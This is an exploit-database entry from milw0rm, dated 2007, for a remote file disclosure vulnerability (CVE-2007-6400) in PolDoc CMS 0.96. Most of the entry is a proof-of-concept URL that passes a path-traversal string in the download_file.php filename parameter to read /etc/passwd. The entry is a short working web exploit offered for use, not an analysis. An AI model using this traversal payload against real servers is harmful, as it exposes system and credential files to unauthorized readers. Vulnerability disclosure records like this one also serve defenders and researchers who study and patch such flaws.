Author: GoLd_M type: webapps platform: php port: date_added: 2007-12-07 date_updated: verified: 1 codes: OSVDB-39503;CVE-2007-6400 tags: aliases: screenshot_url: application_url:
PolDoc CMS 0.96 (download_file.php filename) Remote File Disclosure Vulnerability D . Script : http://sourceforge.net/project/showfiles.php?group_id=100272 POC : /download_file.php?filename=../../../../../../../../etc/passwd # milw0rm.com [2007-12-08]